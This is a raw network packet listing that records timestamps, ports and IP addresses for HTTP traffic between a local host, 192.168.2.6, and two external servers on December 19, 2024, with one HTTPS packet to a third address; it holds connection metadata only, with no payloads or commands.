Dec 19, 2024 10:10:30.992130041 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.992311001 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.992376089 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.992906094 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.992971897 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.993011951 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.993092060 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.993419886 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.993470907 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.993556976 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.993629932 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.994091988 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.994143963 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.994204998 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.994261980 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.994894028 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.994946003 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.994970083 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.995003939 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.995534897 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.995641947 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.995646954 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.995718002 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.996197939 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.996253967 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.996309042 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.996355057 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.996942997 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.997020960 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.997100115 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.997153044 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.997489929 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.997540951 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.997664928 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.997714996 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.998189926 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.998243093 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.998331070 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.998382092 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.998958111 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.999011993 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.999171019 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.999547005 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:30.999897957 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.999955893 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:30.999974012 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.000006914 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.000341892 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.000396967 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.000458002 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.000508070 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.001080990 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.001135111 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.001207113 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.001261950 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.001801968 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.001852989 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.001852036 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.001904964 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.002324104 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.002388954 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.002495050 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.002552986 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.003005028 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.003063917 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.003150940 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.003205061 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.003767014 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.003823996 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.003896952 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.003966093 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.004004955 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:31.004034996 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:31.004096031 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:31.004144907 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:31.004215002 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:31.004247904 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:31.004266024 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:31.004298925 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:31.004350901 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:31.004417896 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.004467010 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:31.004471064 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.004508018 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.004543066 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.005143881 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.005194902 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.005209923 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.005240917 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.005784035 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.005855083 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.005956888 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.006010056 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.006525040 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.006578922 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.006691933 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.006758928 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.007172108 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.007240057 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.007344007 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.007397890 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.007987022 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.008047104 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.008089066 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.008141994 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.008635044 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.008697987 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.008723974 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.008860111 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.009274006 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.009326935 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.009334087 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.009381056 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.009931087 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.009999037 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.010026932 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.010081053 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.010616064 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.010720968 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.010766983 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.010797024 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.011296988 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.011349916 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.011455059 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.011508942 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.012012005 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.012068987 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.012197018 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.012413025 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.012512922 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:31.012623072 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:31.012671947 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.012727976 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.012784958 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.012871027 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.013392925 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.013451099 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.013510942 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.013566017 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.014113903 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.014168024 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.014240026 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.014271975 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:31.014291048 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.014702082 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.014766932 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.039680004 CET	49916	443	192.168.2.6	172.67.179.109
Dec 19, 2024 10:10:31.136375904 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:31.170579910 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.170641899 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.170793056 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.170841932 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.170931101 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.170977116 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.171118975 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.171164036 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.171823978 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.171931028 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.172013044 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.172049999 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.172081947 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.172095060 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.172677994 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.172744036 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.172800064 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.172859907 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.173295021 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.173477888 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.173500061 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.173547983 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.173985004 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.174032927 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.174094915 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.174139023 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.174711943 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.174746990 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.174774885 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.174797058 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.175389051 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.175441980 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.175463915 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.175491095 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.176022053 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.176073074 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.176156044 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.176204920 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.176729918 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.176776886 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.176846981 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.176893950 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.177396059 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.177504063 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.177526951 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.177664995 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.178123951 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.178177118 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.178209066 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.178231001 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.178796053 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.178843021 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.178883076 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.178929090 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.179477930 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.179523945 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.179657936 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.179702997 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.180202007 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.180279016 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.180316925 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.180372953 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.180977106 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.181024075 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.181091070 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.181138039 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.181602001 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.181647062 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.181727886 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.181772947 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.182219028 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.182265997 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.182313919 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.182360888 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.182905912 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.182959080 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.183011055 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.183588028 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.183635950 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.183702946 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.183749914 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.184345961 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.184422016 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.184436083 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.184470892 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.185020924 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.185069084 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.185162067 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.185210943 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.185643911 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.185683012 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.185697079 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.185743093 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.186453104 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.186516047 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.186525106 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.186573029 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.187026978 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.187079906 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.187159061 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.187376022 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.187710047 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.187756062 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.187836885 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.187884092 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.188401937 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.188448906 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.188529968 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.188576937 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.189130068 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.189178944 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.189282894 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.189347029 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.190155983 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.190211058 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.190337896 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.190385103 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.191215992 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.191267014 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.191360950 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.191406965 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.192104101 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.192162037 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.192255974 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.192305088 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.192974091 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.193037987 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.193116903 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.193162918 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.194102049 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.194232941 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.194694042 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.194746971 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.195013046 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.195103884 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.195123911 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.195169926 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.196021080 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.196074009 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.196178913 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.196225882 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.197069883 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.197130919 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.197213888 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.197257042 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.198156118 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.198190928 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.198208094 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.198231936 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.198697090 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.198743105 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.198827982 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.198873997 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.199399948 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.199445963 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.199526072 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.199642897 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.200242043 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.200298071 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.200365067 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.200409889 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.200922012 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.200965881 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.201033115 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.201073885 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.201612949 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.201658964 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.201858997 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.201903105 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.202414989 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.202461958 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.202528954 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.202574968 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.203232050 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.203284979 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.203382015 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.203428030 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.203809023 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.203854084 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.203919888 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.203967094 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.204289913 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.204335928 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.204427004 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.204472065 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.204790115 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.204826117 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.204866886 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.205332994 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.205383062 CET	49910	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:31.205424070 CET	80	49910	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:31.205472946 CET	49910	80	192.168.2.6	185.215.113.16
